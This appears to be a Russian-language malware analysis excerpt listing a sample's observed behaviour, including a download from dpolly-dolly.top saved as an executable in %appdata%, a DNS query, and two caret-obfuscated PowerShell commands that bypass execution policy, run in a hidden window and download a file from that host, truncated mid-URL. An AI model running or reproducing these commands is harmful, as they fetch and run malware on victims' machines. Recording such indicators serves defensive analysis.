Техническая информация
- http://dpolly-dolly.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOWe^RSHeLl.ex^e -ex^E^CU^TIO^NPOl^iC^y^ ^BYpAs^s^ ^-^N^OPROFIlE ^-^win^dOw^STYLE ^hIDd^eN (ne^w-^Object s^ySt^em.N^et^.WeBCLIE^n^t).^d^ow^n^lOAd^f^i^l^e^(^'http://dpolly-dolly.t...
- DNS ASK dp####-dolly.top
- '<SYSTEM32>\cmd.exe' /c "pOWe^RSHeLl.ex^e -ex^E^CU^TIO^NPOl^iC^y^ ^BYpAs^s^ ^-^N^OPROFIlE ^-^win^dOw^STYLE ^hIDd^eN (ne^w-^Object s^ySt^em.N^et^.WeBCLIE^n^t).^d^ow^n^lOAd^f^i^l^e^(^'http://dpolly-dolly.t...' (со скрытым окном)